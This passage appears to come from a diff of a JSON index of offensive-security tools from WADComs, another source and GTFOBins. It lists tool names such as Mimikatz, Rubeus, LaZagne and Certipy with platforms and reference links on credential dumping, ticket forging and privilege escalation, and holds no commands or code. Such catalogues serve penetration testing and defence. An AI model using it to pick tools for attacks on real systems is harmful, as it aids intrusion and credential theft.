eepass","https://www.netexec.wiki/smb-protocol/spidering-shares","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"],"count":24},{"id":"wadcoms:Nmap","name":"Nmap","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"],"count":1},{"id":"wadcoms:PKINIT","name":"PKINIT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"],"count":2},{"id":"wadcoms:PSADmodule","name":"PSADmodule","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/samratashok/ADModule"],"count":1},{"id":"wadcoms:PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"],"count":1},{"id":"wadcoms:Powershell","name":"Powershell","source":"WADComs","platform":["Windows"],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"],"count":1},{"id":"wadcoms:PwshADmodule","name":"PwshADmodule","source":"WADComs","platform":["Windows"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule","https://docs.microsoft.com/en-us/powershell/module/activedirectory/"],"count":2},{"id":"wadcoms:PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"],"count":1},{"id":"wadcoms:PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/shutdownrepo/pywhisker"],"count":1},{"id":"wadcoms:RPCClient","name":"RPCClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"],"count":1},{"id":"wadcoms:Regexe","name":"Regexe","source":"WADComs","platform":["Windows"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"],"count":1},{"id":"wadcoms:Responder","name":"Responder","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"count":2},{"id":"wadcoms:Rubeus","name":"Rubeus","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast","https://github.com/GhostPack/Rubeus#asktgt","https://github.com/GhostPack/Rubeus#brute","https://github.com/GhostPack/Rubeus#kerberoast","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation"],"count":15},{"id":"wadcoms:SMBClient","name":"SMBClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"],"count":5},{"id":"wadcoms:SMBMap","name":"SMBMap","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"],"count":3},{"id":"wadcoms:SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"],"count":2},{"id":"wadcoms:SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"],"count":1},{"id":"wadcoms:SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/SnaffCon/Snaffler"],"count":1},{"id":"wadcoms:Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"],"count":1},{"id":"wadcoms:bloodyAD","name":"bloodyAD","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":9},{"id":"wadcoms:lsassy","name":"lsassy","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"],"count":1},{"id":"wadcoms:targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"],"count":1},{"id":"wadcoms:winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"],"count":1},{"id":"wadcoms:adidnsdump","name":"adidnsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"count":1},{"id":"wadcoms:Certify","name":"Certify","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"count":1},{"id":"wadcoms:Certipy","name":"Certipy","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"count":12},{"id":"wadcoms:Coercer","name":"Coercer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"count":2},{"id":"wadcoms:Comsvcs","name":"Comsvcs","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:CVE","name":"CVE","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"count":1},{"id":"wadcoms:DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"count":1},{"id":"wadcoms:DonPAPI","name":"DonPAPI","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"count":1},{"id":"wadcoms:EfsPotato","name":"EfsPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:GodPotato","name":"GodPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"count":1},{"id":"wadcoms:Hashcat","name":"Hashcat","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"count":6},{"id":"wadcoms:Impacket-dacledit","name":"Impacket-dacledit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"count":1},{"id":"wadcoms:Impacket-describeTicket","name":"Impacket-describeTicket","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"count":1},{"id":"wadcoms:Impacket-findDelegation","name":"Impacket-findDelegation","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"],"count":1},{"id":"wadcoms:Impacket-goldenPac","name":"Impacket-goldenPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/"],"count":1},{"id":"wadcoms:Impacket-mssqlclient","name":"Impacket-mssqlclient","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql","https://www.thehacker.recipes/ad/movement/mssql/execution"],"count":2},{"id":"wadcoms:Impacket-owneredit","name":"Impacket-owneredit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"count":1},{"id":"wadcoms:Impacket-raiseChild","name":"Impacket-raiseChild","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"],"count":1},{"id":"wadcoms:Impacket-ticketConverter","name":"Impacket-ticketConverter","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"count":1},{"id":"wadcoms:John","name":"John","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"count":2},{"id":"wadcoms:JuicyPotatoNG","name":"JuicyPotatoNG","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"count":1},{"id":"wadcoms:Krbrelayx","name":"Krbrelayx","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"count":1},{"id":"wadcoms:LaZagne","name":"LaZagne","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"count":1},{"id":"wadcoms:ldapdomaindump","name":"ldapdomaindump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldapnomnom","name":"ldapnomnom","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldeep","name":"ldeep","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:MANSPIDER","name":"MANSPIDER","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"count":1},{"id":"wadcoms:Mimikatz","name":"Mimikatz","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/","https://attack.mitre.org/techniques/T1003/004/","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/","https://adsecurity.org/?p=1275","https://attack.mitre.org/techniques/T1556/001/"],"count":10},{"id":"wadcoms:Nanodump","name":"Nanodump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:Nltest","name":"Nltest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:noPac","name":"noPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PowerMad","name":"PowerMad","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"count":1},{"id":"wadcoms:PowerUpSQL","name":"PowerUpSQL","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/"],"count":3},{"id":"wadcoms:PowerView","name":"PowerView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://wald0.com/?p=112","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"count":11},{"id":"wadcoms:pre2k","name":"pre2k","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PrinterBug","name":"PrinterBug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:PrintSpoofer","name":"PrintSpoofer","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Procdump","name":"Procdump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:pyGPOAbuse","name":"pyGPOAbuse","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":1},{"id":"wadcoms:Pypykatz","name":"Pypykatz","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:RoguePotato","name":"RoguePotato","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:sam","name":"sam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"count":1},{"id":"wadcoms:ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"count":1},{"id":"wadcoms:SharpChrome","name":"SharpChrome","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"count":1},{"id":"wadcoms:SharpDPAPI","name":"SharpDPAPI","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"count":1},{"id":"wadcoms:SharpGPOAbuse","name":"SharpGPOAbuse","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":2},{"id":"wadcoms:SharpView","name":"SharpView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:SpoolSample","name":"SpoolSample","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:SweetPotato","name":"SweetPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Whisker","name":"Whisker","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":1}] -\ No newline at end of file +[{"id":"gtfo:7z","name":"7z","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/7z/"],"count":2},{"id":"gtfo:R","name":"R","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/R/"],"count":3},{"id":"gtfo:aa-exec","name":"aa-exec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"count":3},{"id":"gtfo:ab","name":"ab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ab/"],"count":6},{"id":"gtfo:acr","name":"acr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/acr/"],"count":3},{"id":"gtfo:agetty","name":"agetty","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/agetty/"],"count":1},{"id":"gtfo:alpine","name":"alpine","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/alpine/"],"count":3},{"id":"gtfo:ansible-playbook","name":"ansible-playbook","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"count":2},{"id":"gtfo:ansible-test","name":"ansible-test","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"count":2},{"id":"gtfo:aoss","name":"aoss","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aoss/"],"count":2},{"id":"gtfo:apache2","name":"apache2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2/"],"count":6},{"id":"gtfo:apache2ctl","name":"apache2ctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"count":2},{"id":"gtfo:apport-cli","name":"apport-cli","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apport-cli/"],"count":1},{"id":"gtfo:apt-get","name":"apt-get","source":"GTFOBins","platform":["Linux"],"aliases":["apt"],"references":["https://gtfobins.github.io/gtfobins/apt-get/"],"count":6},{"id":"gtfo:aptitude","name":"aptitude","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aptitude/"],"count":2},{"id":"gtfo:ar","name":"ar","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ar/"],"count":3},{"id":"gtfo:arch-nspawn","name":"arch-nspawn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"],"count":1},{"id":"gtfo:aria2c","name":"aria2c","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aria2c/"],"count":12},{"id":"gtfo:arj","name":"arj","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arj/"],"count":6},{"id":"gtfo:arp","name":"arp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arp/"],"count":3},{"id":"gtfo:as","name":"as","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/as/"],"count":3},{"id":"gtfo:ascii-xfr","name":"ascii-xfr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"count":3},{"id":"gtfo:ascii85","name":"ascii85","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii85/"],"count":2},{"id":"gtfo:ash","name":"ash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ash/"],"count":6},{"id":"gtfo:aspell","name":"aspell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aspell/"],"count":6},{"id":"gtfo:asterisk","name":"asterisk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/asterisk/"]